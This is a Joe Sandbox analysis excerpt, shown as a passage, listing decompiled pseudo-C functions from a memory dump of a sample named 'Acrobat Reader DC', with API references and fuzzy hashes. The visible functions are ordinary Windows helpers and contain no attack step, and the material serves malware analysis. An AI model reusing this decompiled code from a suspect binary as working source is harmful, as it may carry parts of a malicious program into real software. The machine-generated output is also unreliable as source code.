                                  			E00434CC9(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr* _a8, short* _a12) {
				void* __edi;
				void* __esi;
				short _t25;
				WCHAR* _t33;
				int _t34;
				WCHAR* _t38;
				signed int _t52;
				signed int _t53;
				void* _t56;
				WCHAR* _t57;
				void* _t65;

				_t38 = _a4;
				 *_a8 = 4;
				_t25 = E00434C09(__ecx, __eflags, _t38);
				 *_a12 = _t25;
				_t65 = _t25 - 0xffff;
				if(_t65 != 0) {
					return _t25;
				} else {
					_push(_t56);
					_t52 = lstrlenW(_t38);
					_t4 = _t52 + 1; // 0x1
					_push( ~(0 | _t65 > 0x00000000) | _t4 * 0x00000002);
					_t57 = E004115D7(_t52, _t56, _t65);
					lstrcpyW(_t57, _t38);
					_t57[_t52] = 0;
					_t53 = 0;
					if( *_t57 == 0) {
						L9:
						_push(_t57);
						return E004111DC();
					}
					_t33 = _t57;
					while( *_t33 != 0x3a) {
						_t53 = _t53 + 1;
						_t33 =  &(_t57[_t53]);
						if(_t57[_t53] != 0) {
							continue;
						}
						_push(_t57);
						return E004111DC();
						goto L11;
					}
					_t18 = _t53 * 2; // 0x2
					_t45 = _t57 + _t18 + 2;
					_t34 = lstrcmpiW(_t57 + _t18 + 2, L"cdecl");
					__eflags = _t34;
					if(_t34 == 0) {
						 *_a8 = 1;
					}
					__eflags = 0;
					_t57[_t53] = 0;
					 *_a12 = E00434C09(_t45, 0, _t57);
					goto L9;
				}
				L11:
			}














                                  0x00434cd0
                                  0x00434cd4
                                  0x00434cda
                                  0x00434ce7
                                  0x00434cea
                                  0x00434ced
                                  0x00434d96
                                  0x00434cf3
                                  0x00434cf3
                                  0x00434cfc
                                  0x00434d00
                                  0x00434d11
                                  0x00434d1a
                                  0x00434d1e
                                  0x00434d26
                                  0x00434d2a
                                  0x00434d2f
                                  0x00434d89
                                  0x00434d89
                                  0x00000000
                                  0x00434d93
                                  0x00434d31
                                  0x00434d39
                                  0x00434d3f
                                  0x00434d45
                                  0x00434d48
                                  0x00000000
                                  0x00000000
                                  0x00434d4a
                                  0x00434d57
                                  0x00000000
                                  0x00434d57
                                  0x00434d5f
                                  0x00434d5f
                                  0x00434d64
                                  0x00434d6a
                                  0x00434d6c
                                  0x00434d71
                                  0x00434d71
                                  0x00434d77
                                  0x00434d7a
                                  0x00434d86
                                  0x00000000
                                  0x00434d86
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32 ref: 00434C44
                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • lstrcpyW.KERNEL32 ref: 00434D1E
                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                  • String ID: cdecl
                                  • API String ID: 3850814276-3896280584
                                  • Opcode ID: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                  • Opcode Fuzzy Hash: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004368A0(void* _a4, intOrPtr* _a8) {
				int _v8;
				void* _v12;
				int _t16;
				long _t29;
				struct HWND__** _t38;

				_t38 = _a4;
				SendMessageW( *_t38, 0xb0,  &_a4,  &_v12);
				_t16 = _a4;
				_v8 = _t16;
				_t29 = SendMessageW( *_t38, 0xc9, _t16, 0);
				if(_t29 < 1) {
					 *_a8 = _a4 + 1;
					return 1;
				} else {
					if(_t29 == SendMessageW( *_t38, 0xc9, _a4, 0)) {
						do {
							_a4 = _a4 - 1;
						} while (_t29 == SendMessageW( *_t38, 0xc9, _a4 - 1, 0));
					}
					 *_a8 = _v8 - _a4;
					return 1;
				}
			}








                                  0x004368a8
                                  0x004368c2
                                  0x004368c4
                                  0x004368ca
                                  0x004368d7
                                  0x004368dc
                                  0x00436929
                                  0x00436931
                                  0x004368de
                                  0x004368f0
                                  0x004368f2
                                  0x004368f9
                                  0x00436906
                                  0x004368f2
                                  0x00436915
                                  0x0043691d
                                  0x0043691d

                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004301F8(struct HWND__** _a4, long _a8, WCHAR* _a12, WCHAR* _a16, signed int _a20, int _a24, int _a28, int _a32, int _a36, struct HMENU__* _a40, char _a44) {
				long _t16;
				long _t23;
				struct HINSTANCE__* _t25;
				struct HWND__** _t33;
				struct HWND__* _t34;

				_t16 = _a8;
				_t23 = _a20 | 0x50000000;
				_t33 = _a4;
				if((_t16 & 0x00080000) != 0) {
					_t16 = _t16 & 0xfff7ffff;
				}
				_t25 =  *0x4a8684; // 0x400000
				_t34 = CreateWindowExW(_t16, _a12, _a16, _t23, _a24, _a28, _a32, _a36,  *_t33, _a40, _t25, 0);
				if(_t34 != 0) {
					if(_a44 != 0) {
						SendMessageW(_t34, 0x30, GetStockObject(0x11), 0);
					}
					if(_t33[0x64] >= 0 && _t33[0x67] != 0) {
						ShowWindow(_t34, 0);
					}
				}
				return _t34;
			}








                                  0x004301fe
                                  0x00430202
                                  0x00430209
                                  0x00430211
                                  0x00430213
                                  0x00430213
                                  0x00430218
                                  0x00430248
                                  0x0043024c
                                  0x00430252
                                  0x00430262
                                  0x00430262
                                  0x0043026f
                                  0x0043027d
                                  0x0043027d
                                  0x0043026f
                                  0x00430288

                                  APIs
                                  • CreateWindowExW.USER32 ref: 00430242
                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$CreateMessageObjectSendShowStock
                                  • String ID:
                                  • API String ID: 1358664141-0
                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00443C87(struct HWND__* _a4, WCHAR* _a8, WCHAR* _a12, int _a16, char _a20) {
				intOrPtr _v8;
				char _v12;
				signed int _t11;
				char _t22;
				signed int _t23;
				void* _t24;

				_t22 = _a20;
				_t24 = 0;
				 *0x4974ee = 0;
				if(_t22 != 0) {
					 *0x4974ef = 1;
					_v12 = GetCurrentThreadId();
					_v8 = _t22;
					_t24 = E00413D7F(0, 0, E00443B61,  &_v12, 0,  &_a20);
				}
				_t11 = MessageBoxW(_a4, _a8, _a12, _a16);
				_t23 = _t11;
				if(_t24 != 0) {
					 *0x4974ef = 0;
					WaitForSingleObject(_t24, 0xffffffff);
					_t11 = CloseHandle(_t24);
				}
				if( *0x4974ee != 1) {
					return _t23;
				} else {
					return _t11 | 0xffffffff;
				}
			}









                                  0x00443c8f
                                  0x00443c92
                                  0x00443c94
                                  0x00443c9d
                                  0x00443c9f
                                  0x00443cac
                                  0x00443cbf
                                  0x00443cca
                                  0x00443cca
                                  0x00443cdc
                                  0x00443ce2
                                  0x00443ce6
                                  0x00443ceb
                                  0x00443cf2
                                  0x00443cf9
                                  0x00443cf9
                                  0x00443d06
                                  0x00443d18
                                  0x00443d09
                                  0x00443d10
                                  0x00443d10

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2880819207-0
                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430B87(struct HWND__** _a4, struct HWND__** _a8, int _a12) {
				struct tagPOINT _v16;
				struct tagRECT _v32;
				void* _t25;
				struct HWND__** _t49;

				_t49 = _a4;
				if(_t49[0xe] == 0) {
					GetWindowRect( *_a8,  &_v32);
					_v16.x = _v32.left;
					_v16.y = _v32.top;
					ScreenToClient( *_t49,  &_v16);
					_v32.top = _v16.y;
					_v16.x = _v32.right;
					_v32.left = _v16.x;
					_v16.y = _v32.bottom;
					ScreenToClient( *_t49,  &_v16);
					_v32.right = _v16.x;
					_v32.bottom = _v16.y;
					return InvalidateRect( *_t49,  &_v32, _a12);
				}
				return _t25;
			}







                                  0x00430b8e
                                  0x00430b96
                                  0x00430ba2
                                  0x00430bb7
                                  0x00430bbe
                                  0x00430bc1
                                  0x00430bcc
                                  0x00430bd2
                                  0x00430bd7
                                  0x00430bdf
                                  0x00430be2
                                  0x00430bed
                                  0x00430bf4
                                  0x00000000
                                  0x00430bfb
                                  0x00430c06

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClientRectScreen$InvalidateWindow
                                  • String ID:
                                  • API String ID: 357397906-0
                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433908(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v12;
				char _v20;
				char _v536;
				char _v1052;
				char _v1568;
				char _v2084;

				_t41 = __edi;
				E00413A0E(_a4,  &_v20,  &_v2084,  &_v1568,  &_v536);
				E00413A0E(_a8,  &_v12,  &_v1052,  &_v1568,  &_v536);
				if(_v20 != 0 || _v12 != 0) {
					return E004114AB(_t41,  &_v20,  &_v12) & 0xffffff00 | _t28 != 0x00000000;
				} else {
					return E004114AB(__edi,  &_v2084,  &_v1052) & 0xffffff00 | _t30 != 0x00000000;
				}
			}









                                  0x00433908
                                  0x0043392e
                                  0x00433950
                                  0x0043395d
                                  0x00433997
                                  0x00433966
                                  0x00433981
                                  0x00433981

                                  APIs
                                  • __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • __wsplitpath.LIBCMT ref: 00433950
                                  • __wcsicoll.LIBCMT ref: 00433974
                                  • __wcsicoll.LIBCMT ref: 0043398A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                  • String ID:
                                  • API String ID: 1187119602-0
                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00421E33(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t29;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00421725(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0042180C(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00421D46(__ebx, _t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00421C85(__ebx, _t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                  0x00421e38
                                  0x00421e3e
                                  0x00421eb1
                                  0x00000000
                                  0x00421e45
                                  0x00421e45
                                  0x00421e48
                                  0x00421e63
                                  0x00421e66
                                  0x00421e86
                                  0x00421e98
                                  0x00421e68
                                  0x00421e68
                                  0x00421e6b
                                  0x00000000
                                  0x00421e6d
                                  0x00421e7f
                                  0x00421e7f
                                  0x00421e6b
                                  0x00421eb6
                                  0x00421eba
                                  0x00421e4a
                                  0x00421e62
                                  0x00421e62
                                  0x00421e48

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                  • String ID:
                                  • API String ID: 3016257755-0
                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction ID: fa6d01852bb983edeafff486d0019367465e9530caf48e469f9bea5953271079
                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction Fuzzy Hash: FE11727250005DFBCF125E85EC41CEE3F22BB28394B9A8416FE1858131C73AC9B1AB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E00434963(intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* _t16;
				void* _t18;
				void* _t27;
				intOrPtr _t28;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;

				_t28 = _a8;
				_t43 = _a4;
				_t46 =  *((intOrPtr*)(_t43 + 0x10));
				if(_t46 != 0) {
					_t18 = E004111C1( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
					_push( ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
					_t41 = E004115D7(_t18, _t43,  ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
					E00411567(_t41,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
					E00411536(_t41, _t28);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
					_t27 = E004111DC();
					 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))) = _t41;
					return _t27;
				}
				return _t16;
			}












                                  0x00434967
                                  0x0043496b
                                  0x0043496e
                                  0x00434972
                                  0x0043497b
                                  0x0043499c
                                  0x004349a2
                                  0x004349ab
                                  0x004349b2
                                  0x004349bc
                                  0x004349bd
                                  0x004349c8
                                  0x00000000
                                  0x004349ca
                                  0x004349ce

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                  • String ID:
                                  • API String ID: 1597257046-0
                                  • Opcode ID: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                  • Opcode Fuzzy Hash: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044B5E8(intOrPtr _a4) {
				struct _CRITICAL_SECTION* _t14;
				intOrPtr _t15;

				_t15 = _a4;
				_t14 = _t15 + 0x14;
				EnterCriticalSection(_t14);
				if(InterlockedExchange(_t15 + 0x34,  *(_t15 + 0x34)) != 0x1f6 ||  *((intOrPtr*)(_t15 + 0xc)) != 0) {
					LeaveCriticalSection(_t14);
					return 1;
				} else {
					LeaveCriticalSection(_t14);
					return 0;
				}
			}





                                  0x0044b5ed
                                  0x0044b5f1
                                  0x0044b5f5
                                  0x0044b60e
                                  0x0044b62c
                                  0x0044b638
                                  0x0044b617
                                  0x0044b61a
                                  0x0044b626
                                  0x0044b626

                                  APIs
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                  • String ID:
                                  • API String ID: 2223660684-0
                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004472F1(struct HDC__* _a4, int _a8, int _a12, int _a16, int _a20, signed char _a24) {
				void* _t9;
				struct HDC__* _t19;

				_t19 = _a4;
				if((_a24 & 0x00000002) != 0) {
					E0044719B(_t19, 0, 0xffffffff, 2, 1);
					MoveToEx(_t19, _a8, _a12, 0);
					LineTo(_t19, _a16, _a20);
					if( *0x4a86ec != 0) {
